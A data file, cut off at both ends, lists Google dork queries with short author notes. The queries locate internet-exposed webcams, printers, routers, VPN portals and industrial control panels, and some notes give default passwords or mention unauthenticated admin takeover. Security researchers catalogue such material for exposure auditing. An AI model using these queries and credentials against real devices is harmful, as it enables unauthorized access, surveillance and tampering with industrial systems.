robots.txt\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:Grafana - Home inurl:/orgid", "description": "Finding Grafana Dashboards\r\n\r\n# Google Dork: intitle:Grafana - Home inurl:/orgid\r\n# Date: [16-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:apache couchdb - futon: overview inurl:/_utils", "description": "Couchdb Web Panel\r\n\r\n# Google Dorks: \r\nintitle:apache couchdb - futon: overview inurl:/_utils\r\nintitle:apache couchdb - futon: browse database inurl:/_utils\r\n\r\n# Date: [17-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "site:member.*.*/auth/login", "description": "Login Pages:\r\n\r\nsite:member.*.*/auth/login\r\nsite:members.*.*/auth/login\r\nsite:portal.*.*/auth/login\r\nsite:user.*.*/auth/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"VideoEdge Admin Interface\"", "description": "Various online devices\r\n\r\n- Steve George"}, {"dork": "inurl:webArch/mainFrame filetype:cgi intext:\"Web Image Monitor\"", "description": "Dork: inurl:webArch/mainFrame filetype:cgi intext:\"Web Image Monitor\"\r\n\r\nAuthor: M. Cory Billington\r\n\r\nInfo: Web portals for Ricoh printers/copiers/multifunction machines"}, {"dork": "inurl:\"/hp_login.html\"", "description": "Google Dork Submission for finding publicly facing HP Devices, usually internal switches. Leads to a login screen.\r\n\r\nAuthor: MiningOmerta"}, {"dork": "intitle:\"openshift web console\" inurl:console inurl:/console", "description": "Openshift Web Console\r\n\r\n# Google Dork: intitle:\"openshift web console\" inurl:console inurl:/console\r\n# Date: [12-09-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intext:{{szErrorTip}} inurl:/doc/page/login.asp", "description": "Discover Hikvision IP cameras facing the internet"}, {"dork": "intitle:\"Marshall VS Server\"", "description": "Online Devices:\r\n\r\nintitle:\"Marshall VS Server\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:CGI/Java/Serviceability?adapter=device.statistics.device", "description": "# Google Dork: inurl:CGI/Java/Serviceability?adapter=device.statistics.device\r\n# Description: Google Dork to find Cisco Unified IP Phones\r\n# Date: 2019-11-21\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "inurl:\"/index.php?enter=guest\"", "description": "Zabbix login portal:\r\n\r\ninurl:\"/index.php?enter=guest\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"8080/dashboard/\" intitle:\"Dashboard\"", "description": "Zabbix Login Portal:\r\n\r\ninurl:\"8080/dashboard/\" intitle:\"Dashboard\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Home - Mongo Express\"", "description": "Google dork description: Mongo Express instances. Most have no\r\nauthentication enabled\r\n\r\nGoogle Search: intitle:\"Home - Mongo Express\"\r\n\r\nSubmitted by: Alfie\r\n\r\nTwitter: https://twitter.com/emenalf\r\n\r\n\r\n-- \r\nRegards,\r\nAlfie.\r\nthe-infosec.com"}, {"dork": "intitle:\"WSO2 Management Console\"", "description": "Google dork description: Instances of WSO2 Carbon, an opensource middleware\r\nplatform.\r\n\r\nGoogle Search: intitle:\"WSO2 Management Console\"\r\n\r\nSubmitted by: Alfie\r\n\r\nTwitter: https://twitter.com/emenalf"}, {"dork": "intitle:rsview32 ext:asp", "description": "This dork lists all the OT systems running Rockwell Automation web servers.\r\n\r\nRegards,\r\nSrini"}, {"dork": "\"Firmware Version\" intitle:\"iLO\" ProLiant Login -hpe.com -update", "description": "Dork for device (iLo ProLiant HPE) discovery.\r\nThis is an alternative to shodan\r\n\r\n Bruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Security is Off\" intitle:\"Namenode information\"", "description": "Description:\r\nUnprotected public Hadoop Administration dashboards\r\n\r\nDork :\r\nintext:\"Security is Off\" intitle:\"Namenode information\"\r\n\r\nAuthor:\r\nVipin Joshi (@vocuzi)"}, {"dork": "inurl:/swagger/index.html", "description": "# Exploit Title: Publicly Exposed Swagger API Documentation\r\n# Google Dork: inurl:/swagger/index.html\r\n# Date: 02/19/2020\r\n# Exploit Author: MuckT"}, {"dork": "site:*/cgi-bin/webproc intext:\"username\"", "description": "Online devices:\r\n\r\nsite:*/cgi-bin/webproc intext:\"username\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"nobody/loginQuick.htm\"", "description": "Avtech CCTV Login Page :\r\n\r\ninurl:\"nobody/loginQuick.htm\"\r\n\r\nAuthor : Zulfiqar Wardi (yunaranyancat)"}, {"dork": "intitle:\"IP CAMERA Viewer\" intext:\"setting | Client setting\"", "description": "####################Intro#####################\r\nThis dork shows TP-LINK, Zavio and Intellinet cameras stream.\r\n\r\n################Default Creds##################\r\nZavio and TP-LINK | admin:admin\r\nIntellinet | admin:1234\r\n\r\n###############About me######################\r\nDiscovered by Roni Carta alias Lupin\r\nTwitter : https://twitter.com/0xLupin"}, {"dork": "\"VB Viewer\" inurl:/viewer/live/ja/live.html", "description": "Dork:\r\n\"VB Viewer\" inurl:/viewer/live/ja/live.html\r\n\r\nDescription:\r\nIP Cameras"}, {"dork": "inurl:\"MultiCameraFrame?Mode=Motion\"", "description": "# Google Dork: inurl:\"MultiCameraFrame?Mode=Motion\"\r\n\r\n# By using this dork, various web cameras can be revealed.\r\n\r\n# Date: 12/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"view/index.shtml\"", "description": "# Google Dork: inurl:\"view/index.shtml\"\r\n\r\n# By using this dork, various camera LIVE AXIS MODEL web interfaces can be\r\nfound.\r\n\r\n# Date: 14/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "filetype:psp intitle:\"Motorola - FX9500\"", "description": "Exploit Title: RFID reader information unauthenticated\r\nGoogle dork:filetype:psp intitle:\"Motorola - FX9500\"\r\nDate:3/17/2020\r\nExploit author: techjohnny"}, {"dork": "intitle:ThingsBoard inurl:8080/dashboard", "description": "# Google Dork: intitle:ThingsBoard inurl:8080/dashboard\r\n\r\n# By using this dork, various ThingsBoard dashboards (humidity,\r\ntemperature, etc) can be found.\r\n\r\n# Date: 26/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"EWS Data Collection and Use\"", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:hp/device/deviceinformation", "description": "Category: Various Online Devices\r\n\r\ninurl:hp/device/deviceinformation\r\ninurl:hp/device/firmwareupgrade\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:cgistart", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "intitle:NetworkCamera intext:\"Pan / Tilt\" inurl:ViewerFrame", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:axis-cgi/mjpg/video.cgi", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:view.shtml", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/live.htm intext:\"M-JPEG\"|\"System Log\"|\"Camera-1\"|\"View Control\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/HDDReplay.html", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:8000 intext:\"Copyright CANON INC. 2012\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "intitle:\"webcamXP 5\" inurl:8080 'Live'", "description": "Description: \r\n\r\nintitle:\"webcamXP 5\" inurl:8080 'Live'\r\nintitle:\"webcamXP 5\" inurl:'/gallery.html' -download\r\n\r\nThis google dork gives us the live webcamXP camera footages of various\r\nwebservers."}, {"dork": "intitle:(\"Solr Admin\") AND intext:(\"Dashboard\" AND \"Corporation\")", "description": "# Dork #\r\n\r\nintitle:(\"Solr Admin\") AND intext:(\"Dashboard\" AND \"Corporation\")\r\n\r\n\r\nThis dork possibly allow to view Solr Admin Dashboard."}, {"dork": "intitle:(\"Solr admin page\") AND intext:(\"Make a Query\")", "description": "# Dork #\r\n\r\nintitle:(\"Solr admin page\") AND intext:(\"Make a Query\")"}, {"dork": "intitle:\"Printer Status\" AND inurl:\"/PrinterStatus.html\"", "description": "# Dork #\r\n\r\nintitle:\"Printer Status\" AND inurl:\"/PrinterStatus.html\"\r\n\r\nVarious Online Devices- for Lexmark/Dell Printer."}, {"dork": "inurl:\"/English/pages_WinUS/\" AND intitle:\"Top page\"", "description": "# Dork #\r\n\r\ninurl:\"/English/pages_WinUS/\" AND intitle:\"Top page\"\r\n\r\nVarious Online Devices- for Canon Printer."}, {"dork": "inurl:/dana-cached/sc/", "description": "# Exploit Title: Pulse Secure SSL VPN\r\n\r\n# Google Dork: inurl:/dana-cached/sc\r\n\r\n# Author: Kitchaphan Singchai (idealphase)"}, {"dork": "inurl:/dana/home/ filetype:cgi", "description": "# Exploit Title: Pulse Secure SSL VPN\r\n\r\n# Google Dork: inurl:/dana/home/ filetype:cgi\r\n\r\n# Author: Kitchaphan Singchai (idealphase)"}, {"dork": "intitle:\"index of\" \"cvsweb.cgi\"", "description": "Description: intitle:\"index of\" \"cvsweb.cgi\"\r\nThis google dork contains cvsweb configuration information related to\r\ncommand gateway interface of different websites. Using this dork we can\r\nfind juicy information of different config files and repositories."}, {"dork": "inurl:./sws/index.sws", "description": "inurl:./sws/index.sws\r\n\r\nCategory: Sensitive Information\r\n\r\nSummary:\r\nA Google dork that gives information about Samsung Printer."}, {"dork": "inurl:SSI/index.htm", "description": "inurl:SSI/index.htm\r\n\r\nCategory: Sensitive Information\r\n\r\nSummary:\r\nA Google dork that gives information about HP LaserJet Professional Printer."}, {"dork": "inurl:/frameprop.htm", "description": "inurl:/frameprop.htm\r\n\r\nCategory: Sensitive Information\r\n\r\nSummary:\r\nA Google dork that gives information about Xerox Phaser Printer."}, {"dork": "inurl:sws/index.html AND intext:\"Model Name\" AND intext:\"Serial Number\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/main.html intext:SHARP AND intext:MX-*", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:mainFrame.cgi intext:\"RICOH\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:/index.htm intext:\"Oki Data Corporation\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "inurl:8080/dashboard intitle:Graphite Dashboard", "description": "# Google Dork: inurl:8080/dashboard intitle:Graphite Dashboard\r\n\r\n# Various Graphite Dashboards.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:8080/dashboard.php", "description": "# Google Dork: inurl:8080/dashboard.php\r\n\r\n# Zabbix Dashboards.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Kyocera Command Center\" inurl:index.htm", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "intitle:\"Internet Services\" inurl:default.htm intext:\"FUJI XEROX\"", "description": "Category: Various Online Devices\r\nNicholas Doropoulos"}, {"dork": "intitle:\"WeatherLinkIP Configuration\"", "description": "Category: Various Online Devices\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:/db.php?path_local=", "description": "Dork: inurl:/db.php?path_local=\r\nDescription: This Google dork lists out local test db paths for a\r\nweb-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:/gmap.php?id=", "description": "Dork: inurl:/gmap.php?id=\r\nDescription: This Google dork lists out gmap config details for a drupal\r\nweb-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "site:*/EWS/Exchange.asmx", "description": "Author: MiningOmerta\r\n\r\nFinds indexed Microsoft Exchange Servers (Includes Office 365) for e-mail synchronization.\r\n\r\nsite:*/EWS/Exchange.asmx\r\n\r\nlink:\r\n\r\nhttps://www.google.com/search?q=site%3A*%2FEWS%2FExchange.asmx\r\n\r\nor\r\n\r\nhttps://www.google.com/search?q=site%3A*%2FEWS%2FExchange.asmx+-contoso\r\n\r\nif you don\u2019t want the \u201cHello World\u201d of Microsoft Domains :)"}, {"dork": "intitle:\"WEBCAM 7 \" -inurl:/admin.html", "description": "Google Dork : \r\nintitle:\"WEBCAM 7 \" -inurl:/admin.html\r\nintitle:\"WEBCAM 7 \" -site:.com\r\n\r\n\r\nNisankh Acharjya"}, {"dork": "intitle:\"HP ALM\" \"Application Lifecycle Management\" inurl:/qcbin/ -ext:PDF", "description": "# Google Dork: intitle:\"HP ALM\" \"Application Lifecycle Management\"\r\ninurl:/qcbin/ -ext:PDF\r\n\r\n# Description: Find Hewlett Packard - Application Lifecycle Management.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "allinurl:top.htm?Currenttime", "description": "# Google Dork: allinurl:top.htm?Currenttime\r\n# Just a few internet D-Link Cameras.\r\n# Date: 2020-05-29\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:index.shtml", "description": "Dork: inurl:index.shtml\r\n\r\nDescription: This google dork lists out the various camera LIVE AXIS MODEL\r\naround the world.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:/sws/index.html", "description": "Dorks: inurl:/sws/index.html\r\nCategory: Sensitive Information\r\nSummary: A Google dork that gives information about Samsung Printer."}, {"dork": "inurl:/base/main_login.html intext:\"Login\"", "description": "Dorks: inurl:/base/main_login.html intext:\"Login\"\r\nCategory: Sensitive Information\r\nSummary: A Google dork that gives information about the NETGEAR Router."}, {"dork": "inurl:/jobq.htm AND intext:\"ApeosPort-V\"", "description": "Dorks: inurl:/jobq.htm AND intext:\"ApeosPort-V\"\r\nCategory: Sensitive Information\r\nSummary: A Google dork that gives information about Xerox Printer."}, {"dork": "inurl /view.shtml intext:\"Airport\"", "description": "inurl /view.shtml intext:\"Airport\""}, {"dork": "intitle:\"SFXAdmin - sfx_global\" intext:\"Login Form\"", "description": "# Google Dork: intitle:\"SFXAdmin - sfx_global\" intext:\"Login Form\"\r\n# Various pages containing login portals.\r\n# Date: 3/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/ViewerFrame? intitle:\"Network Camera NetworkCamera\"", "description": "# Google Dork: inurl:/ViewerFrame? intitle:\u201dNetwork Camera NetworkCamera\u201d\r\n# Various online devices.\r\n# Date: 20/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/general/status.html\"", "description": "Dorks: inurl:/frameprop.htm\r\n\r\nCategory: Sensitive Information\r\n\r\nSummary:\r\nA Google dork that gives information about the Brother Printers Printer.\r\n\r\n-- \r\nThanks & Regards,\r\nPrasad Lingamaiah"}, {"dork": "inurl:axis-cgi/jpg", "description": "Description: inurl:axis-cgi/jpg\r\n\r\nThis google dorks give us various screenshot of secured webcam.\r\n\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "intext:\"Frame rate\" inurl:/home/homej.html", "description": "# Google Dork: intext:\"Frame rate\" inurl:/home/homej.html\r\n# Various online devices.\r\n# Date: 24/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Device Name\" | intext:\"Host Name\" inurl:mainFrame.cgi", "description": "# Google Dork: intext:\"Device Name\" | intext:\"Host Name\" inurl:mainFrame.cgi\r\n# Various online devices.\r\n# Date: 24/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:axis-cgi/mjpg/video swf", "description": "inurl:axis-cgi/mjpg/video swf\r\n\r\nThis google dorks give us various videos & clips of secured webcam.\r\nlinkedin profile: https://www.linkedin.com/in/sachin-k-92b521151/\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:/home/homej.html", "description": "# Google Dork: inurl:/home/homej.html\r\n# Various online devices.\r\n# Date: 22/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:8081/ \"Pan, Tilt & Zoom\"", "description": "# Google Dork: inurl:8081/ \"Pan, Tilt & Zoom\"\r\n\r\n# Various online devices (webcams).\r\n\r\n# Date: 29/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"HP LaserJet\" inurl:\"SSI/index.htm\"", "description": "# Google Dork: \"HP LaserJet\" inurl:\"SSI/index.htm\"\r\n\r\n# Various online devices (HP LaserJet Printers).\r\n\r\n# Date: 29/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"webcam\" inurl:login", "description": "My name is Aditya Rana and I would like to report this new google dork.\r\nDescription- intitle:\"webcam\" inurl:login\r\nThis dork gives various online devices login page.\r\n\r\nProof of concept"}, {"dork": "\"Camera Live Image\" inurl:\"guestimage.html\"", "description": "# Google Dork: \"Camera Live Image\" inurl:\"guestimage.html\"\r\n# Various online devices (webcams).\r\n# Date: 07/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"UPS Status\" \"Status\" inurl:/host", "description": "# Google Dork: intitle:\"UPS Status\" \"Status\" inurl:/host\r\n# Various online devices (UPS Devices).\r\n# Date: 06/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:.*eservices/login", "description": "#Dork:inurl:.*eservices/login\r\n#Description: lists eservices logins of govt/org\r\n#Author: Jitendra Kumar Tripathi\r\n\r\nSent with ProtonMail Secure Email."}, {"dork": "intitle:\"Tuxedo Connected Controller\"", "description": "# Google Dork: intitle:\"Tuxedo Connected Controller\"\r\n# Web based home automation control pages.\r\n# Date: 20/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/config/cam_portal.cgi \"Panasonic\"", "description": "# Google Dork: inurl:/config/cam_portal.cgi \"Panasonic\"\r\n# Panasonic Network Camera Management System\r\n# Date: 20/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"view.shtml\" \"Network Camera\"", "description": "# Google Dork: inurl:\"view.shtml\" \"Network Camera\"\r\n# Various online devices (webcams).\r\n# Date: 21/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"Welcome to the Web-Based Configurator\"", "description": "Google Dork: allintitle:\"Welcome to the Web-Based Configurator\"\r\n\r\nDescription: This Google Dork is useful in detecting login pages/portals of\r\nZyXEL based networking devices, mainly router configuration interfaces.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "inurl:/presentation/html/top/index.html", "description": "# Google Dork: inurl:/presentation/html/top/index.html\r\n# Description: discover publicly available Epson devices (printer, scanner etc.)\r\n# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)"}, {"dork": "intitle:\"Miniweb Start Page\"", "description": "# Google Dork: intitle:\"Miniweb Start Page\"\r\n# Siemens SIMATIC HMI panels.\r\n# Date: 27/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:8080/view/viewer_index.shtml?id= -site:*.com", "description": "# Dork: inurl:8080/view/viewer_index.shtml?id= -site:*.com\r\n# Author: Mehmet Ali Kerimoglu"}, {"dork": "intitle:\"Rockwell Automation\" inurl:\"index.html\" \"Device Name\"", "description": "# Google Dork: intitle:\"Rockwell Automation\" inurl:\"index.html\" \"DeviceName\"\r\n# Rockwell Automation PLC dashboards.\r\n# Date: 26/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/viewer/live/index.html\"", "description": "# Explanation: Webcams, mostly controllable without authentication.\r\n# Google Dork: inurl:\"/viewer/live/index.html\"\r\n# Date: 17SEP2020\r\n# Exploit Author: Frank Rizzuto"}, {"dork": "inurl:/CgiStart?page", "description": "# Google Dork: inurl:/CgiStart?page\r\n# Various online devices (webcams).\r\n# Date: 18/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/viewer/live.html\"", "description": "#Exploit Title : Webcams, various online devices.\r\n#Google Dork: inurl:\"/viewer/live.html\"\r\n#Date : 18/09/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n*Sanu Jose M*"}, {"dork": "inurl:\"live/cam.html\"", "description": "#Exploit Title : Webcams, various online devices.\r\n#Google Dork: inurl:\"live/cam.html\"\r\n#Date : 23/09/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\nSanu Jose M"}, {"dork": "\"Pop-up\" + \"Live Image\" inurl:index.html", "description": "# Google Dork: \"Pop-up\" + \"Live Image\" inurl:index.html\r\n# Various online devices (webcams).\r\n# Date: 28/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"webArch/mainFrame.cgi\" + \"Web Image Monitor\"", "description": "# Google Dork: inurl:\"webArch/mainFrame.cgi\" + \"Web Image Monitor\"\r\n# Web portals for Ricoh printers.\r\n# Date: 26/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/8080 \"windows\" \"live view\"", "description": "#Exploit Title :Webcams, various online devices.\r\n#Google Dork: inurl:/8080 \"windows\" \"live view\"\r\n#Date : 30/09/2020\r\n#Exploit Author : Raghotham Mruthike\r\n\r\nWarm regards\r\nRaghotham Mruthike"}, {"dork": "inurl:set_config_password.html", "description": "# inurl:set_config_password.html\r\n\r\n# HP Printer login portals, where authentication is not set. Attackers can\r\nvisit the links from the dork output to set Administrator Password.\r\n\r\n# Date: 17/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"NetCamSC*\" | intitle:\"NetCamXL*\" inurl:index.html", "description": "# Google Dork: intitle:\"NetCamSC*\" | intitle:\"NetCamXL*\" inurl:index.html\r\n\r\n# Various online devices (webcams).\r\n\r\n# Date: 15/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/index.html?size=2&mode=4", "description": "Dorks: inurl:/index.html?size=2&mode=4\r\n\r\nCategory: Various Online Devices\r\n\r\nSummary:\r\nA Google dork that gives the online camera login information."}, {"dork": "inurl: 1051/viewer/live/index.html?lang=en", "description": "# Google Dork inurl: 1051/viewer/live/index.html?lang=en\r\n\r\n# Exploit Author: Emre Durmaz"}, {"dork": "inurl:/homej.html?", "description": "#Exploit Title : Various online devices\r\n#Google Dork : inurl:/homej.html?\r\n#Date : 06/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\nSanu Jose M"}, {"dork": "inurl:/Jview.htm + \"View Video - Java Mode\"", "description": "# Google Dork: inurl:/Jview.htm + \"View Video - Java Mode\"\r\n# Various online devices.\r\n# Date: 17/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"view.shtml\" \"Network\"", "description": "#Exploit Title : Various online devices (webcams).\r\n#Google Dork : inurl:\"view.shtml\" \"Network\"\r\n#Date : 18/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\nSanu Jose M"}, {"dork": "inurl:\"view.shtml\" \"camera\"", "description": "#Exploit Title : Various online devices (webcams).\r\n#Google Dork : inurl:\"view.shtml\" \"camera\"\r\n#Date : 18/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:\"/cgi-bin/guestimage.html\" \"Menu\"", "description": "# Google Dork: inurl:\"/cgi-bin/guestimage.html\" \"Menu\"\r\n# Various online devices.\r\n# Date: 24/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"change the Administrator Password.\" intitle:\"HP LaserJet\" -pdf", "description": "# Google Dork: \"change the Administrator Password.\" intitle:\"HP LaserJet\" -pdf\r\n# HP Printer login portals.\r\n# Date: 25/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl: inurl:\"view.shtml\" ext:shtml", "description": "#Google Dork : inurl: inurl:\"view.shtml\" ext:shtml\r\n# shows devices connected\r\n#Exploit Author : ANURAG K P"}, {"dork": "intext:\"Connection\" AND \"Network name\" AND \" Cisco Meraki cloud\" AND \"Security Appliance details\"", "description": "Dorks: intext:\"Connection\" AND \"Network name\" AND \" Cisco Meraki cloud\" AND \"Security Appliance details\"\r\nCategory: Various Online Devices\r\nSummary:\r\nA Google dork that gives the Cisco Meraki Firewall information."}, {"dork": "inurl:/Jview.htm + intext:\"Zoom :\"", "description": "Dorks: inurl:/Jview.htm + intext:\"Zoom :\"\r\nCategory: Various Online Devices\r\nSummary:\r\nA Google dork that gives the online camera information."}, {"dork": "intitle:\"Agent web client: Phone Login\"", "description": "# Google Dork: intitle:\"Agent web client: Phone Login\"\r\n# Pages containing login portals.\r\n# Date: 3/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"System\" + \"Toner\" + \"Input Tray\" + \"Output Tray\" inurl:cgi", "description": "# Google Dork: \"System\" + \"Toner\" + \"Input Tray\" + \"Output Tray\" inurl:cgi\r\n\r\n# Various online devices (printers).\r\n\r\n# Date: 3/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"NetCamXL*\"", "description": "#Exploit Title :Various online devices.\r\n\r\n#Google Dork :intitle:\"NetCamXL*\"\r\n\r\n#Date : 2/12/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "intitle:\"NetCamSC*\"", "description": "#Exploit Title :Various online devices.\r\n\r\n#Google Dork : intitle:\"NetCamSC*\"\r\n\r\n#Date : 2/12/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "AXIS Camera exploit", "description": "#Exploit Title : AXIS Camera View (CCTV).\r\n#Google Dork : intitle:\"Live View / - AXIS\" | inurl:/mjpg/video.mjpg?timestamp\r\n# Exploit Author: RedHackBro\r\n\r\n\r\nThanks,\r\nRedHackBro"}, {"dork": "inurl:/Jview \"zoom\"", "description": "#Exploit Title : Various Online Devices.\r\n#Google Dork : inurl:/Jview \"zoom\"\r\n#Summary :A Google dork that gives the online camera information.\r\n#Date : 11/01/2021\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\nSanu Jose M"}, {"dork": "site:*/dyn_sensors.htm \"ID\"", "description": "# Google Dork: site:*/dyn_sensors.htm \"ID\"\r\n# Various online devices.\r\n# Date: 27/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:dtm.html intitle:1747-L551", "description": "# Google Dork: inurl:dtm.html intitle:1747-L551\r\n# Various online devices.\r\n# Date: 27/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:login.html intitle:\"Archer C7\"", "description": "Dork: inurl:login.html intitle:\"Archer C7\""}, {"dork": "intitle:\"IP Webcam\" inurl:\"/greet.html\"", "description": "Dork: intitle:\"IP Webcam\" inurl:\"/greet.html\""}, {"dork": "\"Account\" \"Password\" \"All rights reserved\" intitle:\"HG8245\"", "description": "Dork: \"Account\" \"Password\" \"All rights reserved\" intitle:\"HG8245\""}, {"dork": "intitle:\"D-LINK SYSTEMS, INC. | Web File Access : Login\"", "description": "Dork: intitle:\"D-LINK SYSTEMS, INC. | Web File Access : Login\""}, {"dork": "inurl:login.html intitle:\"GPON Home Gateway\"", "description": "Dork: inurl:login.html intitle:\"GPON Home Gateway\""}, {"dork": "inurl:\"portal.mwsl\" \"Status\"", "description": "# Google Dork: inurl:\"portal.mwsl\" \"Status\"\r\n\r\n# Various online devices (Siemens S7 series of PLC controllers - SCADA)\r\n\r\n# Date: 9/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Intelbras\" inurl:cgi-bin/firmware.cgi?formNumber=200", "description": "# Dork: intitle:\"Intelbras\" inurl:cgi-bin/firmware.cgi?formNumber=200"}, {"dork": "intitle:(\"WebRTU z2\" | \"WebRTU z1\") -pdf", "description": "# Google Dork: intitle:(\"WebRTU z2\" | \"WebRTU z1\") -pdf\r\n\r\n# Various online devices (mostly industrial systems).\r\n\r\n# Date: 25/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:(\"OnCell Web Console\" | \"Series Web Console\" | \"-HSPA Series Web\" | \"-HSDPA Series Web\") \"MOXA OnCell\" \"Username :\" \"Password :\" -pdf", "description": "# Google Dork: intitle:(\"OnCell Web Console\" | \"Series Web Console\" | \"-HSPA Series Web\" | \"-HSDPA Series Web\") \"MOXA OnCell\" \"Username :\" \"Password :\" -pdf\r\n\r\n# Various online devices.\r\n\r\n# Date: 25/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"PowerLogic ION\" + \"Control\" + \"Diagnostic\" + \"Home\" + \"Maintenance\" + \"Monitoring\"", "description": "# Google Dork: intitle:\"PowerLogic ION\" + \"Control\" + \"Diagnostic\" + \"Home\" + \"Maintenance\" + \"Monitoring\"\r\n\r\n# Various online devices (Power Meter PLC).\r\n\r\n# Date: 25/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Total Web Solutions\" + \"Meter Name\"", "description": "# Google Dork: intitle:\"Total Web Solutions\" + \"Meter Name\"\r\n\r\n# Various online devices (Power Monitoring Meter/Software).\r\n\r\n# Date: 01/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Copyright(C) CONTEC CO.LTD\"", "description": "# Category: Various online devices\r\n\r\n# Description: Find dashboards of several measurement systems for \r\nphotovoltaic power generation\r\n\r\n# Google Dork: \"Copyright(C) CONTEC CO.LTD\"\r\n\r\n# Vendor Homepage: https://www.contec.com/products-services/environmental-monitoring/solarview/pv-package/sv-cpt-pack01/feature/\r\n\r\n# Author: js-on\r\n\r\n# Date: 28/2/2021\r\n\r\nCheers!"}, {"dork": "intitle:\"Remote UI: 